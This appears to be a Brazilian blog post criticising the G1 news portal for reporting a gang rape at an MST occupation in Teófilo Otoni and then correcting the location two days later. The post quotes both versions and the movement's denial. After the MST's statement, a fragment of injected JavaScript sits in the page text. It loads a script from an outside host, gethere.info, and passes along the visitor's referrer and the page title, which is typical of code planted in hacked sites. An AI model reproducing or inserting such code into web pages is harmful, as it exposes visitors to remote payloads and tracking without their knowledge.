Capa / Em Destaque / G1 “noticia” estupro em ocupação de sem terras e volta atrás dois dias após

G1 “noticia” estupro em ocupação de sem terras e volta atrás dois dias após

Estupro de jornalismoO Portal G1, de Minas Gerais (da Globo) noticiou no sábado um “estupro coletivo” que teria ocorrido, segundo a reportagem, dentro de uma ocupação de Sem Terras na cidade de Teófilo Otoni, em Minas Gerais. Dois dias depois, o site voltou atrás e “corrigiu” a “informação”. Na verdade,. Tratava-se, segundo a correção, de um crime ocorrido em um terreno invadido e, pela correção, não foi informado os responsáveis pelo suposto estupro.

“O G1 errou ao informar em reportagem publicada no sábado (4) que uma mulher foi estuprada em uma ocupação do MST em Teófilo Otoni. Na verdade, a Polícia Militar informou que o crime ocorreu em um terreno invadido e não soube informar que grupo invadiu o local. A reportagem foi corrigida às 18h34 de segunda-feira (6)”, explicou-se.

Segundo a primeira publicação, a Polícia Miliar chegou a fazer “buscas para localizar dois homens do Movimento Sem Terra (MST) que abusaram sexualmente de uma mulher de 42 anos dentro de um acampamento no Bairro Castro Pires, em Teófilo Otoni, no Vale do Mucuri”. Para a publicação, a vítima estaria embriagada “quando foi estuprada”.

A reportagem apresenta uma riqueza de detalhes que levaria qualquer pessoa a acreditar o “fato”. “A mulher contou que estava em um bar quando um homem a convidou para ir em um dos barracos da ocupação do MST. Quando chegou ao local, ela percebeu que outro homem estava esperando. Os dois homens violentaram a vítima”.

A reportagem desta segunda-feira, 06, após a correção, mantém as principais informações, mas corrige a localização do fato, “um terreno invadido no Bairro Castro Pires, em Teófilo Otoni (MG)” e as informações atroibuidas à suposta vítima desta vez é atribuída a policiais. “De acordo com os militares, a vítima, que apresentava sinais de embriaguez, relatou aos policiais que estava em um bar…”

O MST disse em nota que não há qualquer ocupação município sob responsabilidade do movimento, que reafirma seu compromisso com o combate a violência contra a mulher e que não tolera condutas criminosas entre seus membros.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top